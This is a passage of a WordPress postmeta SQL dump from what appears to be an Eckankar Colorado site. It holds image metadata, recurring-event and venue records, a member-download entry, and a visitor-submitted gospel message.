wcsquare\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-2-300x116.png\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:37:\"members-newsletter-bgrid-2-250x58.png\";s:5:\"width\";i:250;s:6:\"height\";i:58;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-2-210x116.png\";s:5:\"width\";i:210;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-2-400x116.png\";s:5:\"width\";i:400;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(104126,262441,'_EventStartDate','2020-12-16 19:00:00'),(29951,211084,'_wp_attached_file','2019/12/members-newsletter-bgrid-4.png'),(29952,211084,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:116;s:4:\"file\";s:38:\"2019/12/members-newsletter-bgrid-4.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"members-newsletter-bgrid-4-300x70.png\";s:5:\"width\";i:300;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-4-150x116.png\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-4-450x116.png\";s:5:\"width\";i:450;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"members-newsletter-bgrid-4-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-4-300x116.png\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:37:\"members-newsletter-bgrid-4-250x58.png\";s:5:\"width\";i:250;s:6:\"height\";i:58;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-4-210x116.png\";s:5:\"width\";i:210;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-4-400x116.png\";s:5:\"width\";i:400;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(66684,251919,'_wp_attached_file','2020/01/wisdom-of-the-heart-book-2.jpg'),(66685,251919,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/wisdom-of-the-heart-book-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"wisdom-of-the-heart-book-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-2-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30000,213454,'_edit_lock','1584917971:2'),(30001,213454,'_edit_last','2'),(30002,213454,'sdm_description','<p class=\"\"><span style=\"font-size: 16pt;color: #1e5891\">This Area Requires A Member Password.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt\"><b>Please enter the last word in the title of Sri Harold’s lead article in the current issue of the Mystic World </b></span><span style=\"font-size: 12pt\">(in lowercase letters).</span></p>'),(30003,213454,'sdm_upload','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf'),(30004,213454,'sdm_item_dispatch',NULL),(30005,213454,'sdm_item_new_window',NULL),(30006,213454,'sdm_item_hide_dl_button_single_download_page',NULL),(30007,213454,'sdm_item_disable_single_download_page',NULL),(30008,213454,'sdm_upload_thumbnail',''),(30009,213454,'sdm_count_offset','0'),(30010,213454,'sdm_item_show_date_fd',NULL),(30011,213454,'sdm_item_show_file_size_fd',NULL),(30012,213454,'sdm_item_show_item_version_fd',NULL),(30013,213454,'sdm_item_file_size',''),(30014,213454,'sdm_item_version',''),(30015,213454,'sdm_download_button_text',''),(92748,261620,'_field_138','GOSPEL MESSAGE (Part I)\n\nWe do not become Christians by following some manual, religious ceremony or using some technique.  Our conversion is a result of God’s implanting His Spirit in our heart, giving us new power to live or him. The Holy Spirit gives new life to all who believes and accepts Jesus as their personal Lord and Savior.\n\n”But you will receive power when the Holy Spirit comes on you; and you will be my witnesses in Jerusalem, and in all Judea and Samaria, and to the ends of the earth.\" (Acts 1:8)\n\nThe Holy Spirit is given now, immediately when anyone believes in Jesus. There is no sign, no feeling, no emotional indication of it. It occurs, as Jesus said it would, when any believe on him. It is the means by which the risen life of Jesus becomes available to us, continuously and constantly. All that he is made available through all that I am.\n\nIt is a glorious kind of power. It does not need any props, does not require outside help, and does not borrow anything from the world. It does not even need a cup of coffee to get started in the morning! And it works best in a cemetery. It operates most visibly where everything is dull and lifeless, and nothing is happening. Anyone who is operating on resurrection power can come in and change the whole scene. \n\nResurrection power changes lives from within and not from without. It does not start on the outside, with the environment, or the circumstances, or the external situation; it starts within, and works out, to change the environment ultimately. And it does not separate or divide; it harmonizes, it heals, it draws together and breaks down \"middle walls of partition\" (Ephesians 2:14 KJV) that have been standing sometimes for centuries. It batters them down and brings people together, in harmony. It is a totally different kind of power. That is what you receive when you receive the Holy Spirit.\n\nAll of us have messed up our lives in one way or another; we have destroyed the wholeness already. But the glory of the good news is that in coming to Jesus, through his work on the cross on our behalf and his raising again from the dead, he can actually give us a new start. All the past is wiped out and forgiven. We are restored.\n\nSome of you may have been going to church for years. You have been hearing the gospel but you have never opened your hearts to God. But that is the final, necessary step. Ultimately, the will must be moved. Jesus said in Revelation, \"Behold I stand at the door (the door of the heart) and knock. If anyone hears my voice (feels desire), and will open the door (invite him to come in), I will come into him and live with him and he with me,\" Revelation 3:20). That is what happened in Thessalonica.\nThat is \"the work of faith.\" Until you have actually received Christ, you have not exercised faith. You can believe the story to be true, but until it moves you to receive the Lord you have not exercised faith. \n\nAll Have Sinned – Romans 3:23\n“For all have sinned and fallen short of the glory of God.”\n\nThe Wages of Sin is Death – Romans 6:23\n“For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus, our Lord.”\n\nGod Loves You – Romans 5:8\n“God demonstrated His live toward us, in that while we were yet sinners, Christ died for us.”\n\nConfession and Salvation – Romans 10:9\n“That if you confess with your mouth Jesus as Lord, and believe in your heart that God raised Him from the dead, you shall be saved.”\n\nThus the religion of the world, with its emphasis upon the external, is ignored by God. Man fulfills his proper function only by receiving what God has done in Christ, without any need for observances or candles or form or ceremony, but by a quiet act of faith. That is the simplicity of belief in Jesus Christ. It is so uncomplicated, so simple, so available to all.\n\nIf you want to receive Christ into your life, visit this important message:\n\nhttp://www.harvest.org/knowgod/\n'),(92747,261620,'_field_137','GOSPEL MESSAGE (Part I)'),(92746,261620,'_field_135','glen.gorpe@gmxl.net'),(30180,201534,'_edit_last','2'),(30996,225018,'_EventShowMapLink','1'),(30994,225018,'boldgrid_hide_page_title','1'),(30992,225018,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679395;s:13:\"_thumbnail_id\";i:1607507092;s:24:\"boldgrid_hide_page_title\";i:1576679395;s:16:\"_EventRecurrence\";i:1610628570;s:17:\"_EventShowMapLink\";i:1576679395;s:13:\"_EventShowMap\";i:1576679395;s:13:\"_EventVenueID\";i:1607440374;s:15:\"_EventStartDate\";i:1610628570;s:13:\"_EventEndDate\";i:1610628570;s:18:\"_EventStartDateUTC\";i:1610628570;s:16:\"_EventEndDateUTC\";i:1610628570;s:14:\"_EventDuration\";i:1610628570;s:20:\"_EventCurrencySymbol\";i:1576679395;s:22:\"_EventCurrencyPosition\";i:1576679395;s:10:\"_EventCost\";i:1576679395;s:9:\"_EventURL\";i:1576679395;s:14:\"_EventTimezone\";i:1576679395;s:18:\"_EventTimezoneAbbr\";i:1576679395;s:12:\"_dp_original\";i:1576679395;s:16:\"tribe_events_cat\";i:1610652835;s:10:\"_edit_last\";i:1576679466;s:10:\"post_title\";i:1610628447;s:12:\"post_content\";i:1610628447;s:11:\"post_status\";i:1576679577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"protect_children\";i:1606922613;s:26:\"_RTECregistrationsDisabled\";i:1606922613;s:17:\"_RTECdeadlineType\";i:1606922613;s:19:\"_RTECwhoCanRegister\";i:1606922613;s:23:\"_RTEClimitRegistrations\";i:1606922613;s:21:\"_RTECmaxRegistrations\";i:1606922613;s:22:\"_EventHideFromUpcoming\";i:1607507212;s:12:\"_wp_old_slug\";i:1607510391;}'),(31005,225018,'_EventCurrencyPosition','prefix'),(104071,262435,'_VenuePhone',''),(104072,262435,'_VenueURL',''),(95309,261992,'_wp_attached_file','2020/09/satsang-bk-1.jpg'),(95310,261992,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1155;s:6:\"height\";i:229;s:4:\"file\";s:24:\"2020/09/satsang-bk-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"satsang-bk-1-300x59.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:59;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"satsang-bk-1-1024x203.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"satsang-bk-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"satsang-bk-1-768x152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"satsang-bk-1-450x229.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(104073,262435,'_VenueStateProvince',''),(104074,262435,'_VenueOverwriteCoords','0'),(142536,265030,'_menu_item_target',''),(142537,265030,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(142538,265030,'_menu_item_xfn',''),(104075,262435,'boldgrid_hide_page_title','0'),(104076,262435,'_edit_lock','1607017153:2'),(142539,265030,'_menu_item_url',''),(179301,265030,'_menu_sgpb_popup_id','0'),(143024,264903,'_wp_old_date','2021-05-14'),(132592,263792,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21903;s:12:\"smushed-size\";i:21194;s:15:\"savings-percent\";d:3.2400000000000002131628207280300557613372802734375;}'),(117238,262888,'_RTECwhoCanRegister','any'),(117239,262888,'_RTEClimitRegistrations','0'),(117240,262888,'_RTECmaxRegistrations','30'),(117241,262888,'boldgrid_hide_page_title','0'),(117242,262888,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(31004,225018,'_EventCurrencySymbol',''),(31003,225018,'_EventDuration','5400'),(118923,262957,'_RTECregistrationsDisabled','1'),(118924,262957,'_RTECdeadlineType','start'),(118925,262957,'_RTECwhoCanRegister','any'),(118926,262957,'_RTEClimitRegistrations','0'),(118927,262957,'_RTECmaxRegistrations','30'),(118928,262957,'boldgrid_hide_page_title','0'),(118929,262957,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118917,262957,'_EventDuration','4500'),(118918,262957,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118916,262957,'_EventEndDateUTC','2021-05-09 16:15:00'),(118915,262957,'_EventEndDate','2021-05-09 10:15:00'),(118913,262957,'_EventStartDate','2021-05-09 09:00:00'),(118914,262957,'_EventStartDateUTC','2021-05-09 15:00:00'),(118919,262957,'protect_children',''),(118920,262957,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118146,262871,'_RTECmaxRegistrations','30'),(118147,262871,'boldgrid_hide_page_title','0'),(31002,225018,'_EventEndDateUTC','2020-11-01 20:30:00'),(31001,225018,'_EventStartDateUTC','2020-11-01 19:00:00'),(30999,225018,'_EventStartDate','2020-11-01 12:00:00'),(104735,225018,'_EventVenueID','262507'),(104701,262507,'protect_children',''),(104702,262507,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607439820;s:12:\"_VenueOrigin\";i:1607439820;s:10:\"_edit_last\";i:1607439836;s:10:\"post_title\";i:1607439836;s:11:\"post_status\";i:1607439840;s:17:\"_EventShowMapLink\";i:1607439840;s:13:\"_EventShowMap\";i:1607439840;s:17:\"_VenueShowMapLink\";i:1607439840;s:13:\"_VenueShowMap\";i:1607439840;s:13:\"_VenueAddress\";i:1607439840;s:10:\"_VenueCity\";i:1607439840;s:13:\"_VenueCountry\";i:1607439840;s:14:\"_VenueProvince\";i:1607439840;s:11:\"_VenueState\";i:1607439840;s:9:\"_VenueZip\";i:1607439840;s:11:\"_VenuePhone\";i:1607439840;s:9:\"_VenueURL\";i:1607439840;s:19:\"_VenueStateProvince\";i:1607439840;s:21:\"_VenueOverwriteCoords\";i:1607439840;s:24:\"boldgrid_hide_page_title\";i:1607439840;}'),(30997,225018,'_EventShowMap','1'),(31000,225018,'_EventEndDate','2020-11-01 13:30:00'),(30987,225018,'_EventOrigin','events-calendar'),(30988,225018,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679395;s:13:\"_thumbnail_id\";i:1607507092;s:24:\"boldgrid_hide_page_title\";i:1576679395;s:16:\"_EventRecurrence\";i:1610628570;s:17:\"_EventShowMapLink\";i:1576679395;s:13:\"_EventShowMap\";i:1576679395;s:13:\"_EventVenueID\";i:1607440374;s:15:\"_EventStartDate\";i:1610628570;s:13:\"_EventEndDate\";i:1610628570;s:18:\"_EventStartDateUTC\";i:1610628570;s:16:\"_EventEndDateUTC\";i:1610628570;s:14:\"_EventDuration\";i:1610628570;s:20:\"_EventCurrencySymbol\";i:1576679395;s:22:\"_EventCurrencyPosition\";i:1576679395;s:10:\"_EventCost\";i:1576679395;s:9:\"_EventURL\";i:1576679395;s:14:\"_EventTimezone\";i:1576679395;s:18:\"_EventTimezoneAbbr\";i:1576679395;s:12:\"_dp_original\";i:1576679395;s:16:\"tribe_events_cat\";i:1610652835;s:10:\"_edit_last\";i:1576679466;s:10:\"post_title\";i:1610628447;s:12:\"post_content\";i:1610628447;s:11:\"post_status\";i:1576679577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"protect_children\";i:1606922613;s:26:\"_RTECregistrationsDisabled\";i:1606922613;s:17:\"_RTECdeadlineType\";i:1606922613;s:19:\"_RTECwhoCanRegister\";i:1606922613;s:23:\"_RTEClimitRegistrations\";i:1606922613;s:21:\"_RTECmaxRegistrations\";i:1606922613;s:22:\"_EventHideFromUpcoming\";i:1607507212;s:12:\"_wp_old_slug\";i:1607510391;}'),(30989,225018,'_EventOrigin','events-calendar'),(30990,225018,'_EventOrigin','events-calendar'),(30991,225018,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679395;s:13:\"_thumbnail_id\";i:1607507092;s:24:\"boldgrid_hide_page_title\";i:1576679395;s:16:\"_EventRecurrence\";i:1610628570;s:17:\"_EventShowMapLink\";i:1576679395;s:13:\"_EventShowMap\";i:1576679395;s:13:\"_EventVenueID\";i:1607440374;s:15:\"_EventStartDate\";i:1610628570;s:13:\"_EventEndDate\";i:1610628570;s:18:\"_EventStartDateUTC\";i:1610628570;s:16:\"_EventEndDateUTC\";i:1610628570;s:14:\"_EventDuration\";i:1610628570;s:20:\"_EventCurrencySymbol\";i:1576679395;s:22:\"_EventCurrencyPosition\";i:1576679395;s:10:\"_EventCost\";i:1576679395;s:9:\"_EventURL\";i:1576679395;s:14:\"_EventTimezone\";i:1576679395;s:18:\"_EventTimezoneAbbr\";i:1576679395;s:12:\"_dp_original\";i:1576679395;s:16:\"tribe_events_cat\";i:1610652835;s:10:\"_edit_last\";i:1576679466;s:10:\"post_title\";i:1610628447;s:12:\"post_content\";i:1610628447;s:11:\"post_status\";i:1576679577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"protect_children\";i:1606922613;s:26:\"_RTECregistrationsDisabled\";i:1606922613;s:17:\"_RTECdeadlineType\";i:1606922613;s:19:\"_RTECwhoCanRegister\";i:1606922613;s:23:\"_RTEClimitRegistrations\";i:1606922613;s:21:\"_RTECmaxRegistrations\";i:1606922613;s:22:\"_EventHideFromUpcoming\";i:1607507212;s:12:\"_wp_old_slug\";i:1607510391;}'),(30995,225018,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(104703,262507,'_VenueOrigin','events-calendar'),(115741,262795,'boldgrid_hide_page_title','0'),(119622,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(113055,262751,'_EventStartDate','2021-10-12 19:00:00'),(113056,262751,'_EventStartDateUTC','2021-10-13 01:00:00'),(113057,262751,'_EventEndDate','2021-10-12 20:00:00'),(119681,262751,'protect_children',''),(113058,262751,'_EventEndDateUTC','2021-10-13 02:00:00'),(113059,262751,'_EventDuration','3600'),(119530,262747,'boldgrid_hide_page_title','1'),(119531,262747,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119525,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(121025,263190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:555;s:6:\"height\";i:323;s:4:\"file\";s:30:\"2021/01/eck-temple-co-nd-2.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"eck-temple-co-nd-2-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"eck-temple-co-nd-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"eck-temple-co-nd-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121024,263190,'_wp_attached_file','2021/01/eck-temple-co-nd-2.jpg'),(122483,263255,'_dp_original','201534'),(119495,262746,'boldgrid_hide_page_title','1'),(119496,262746,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 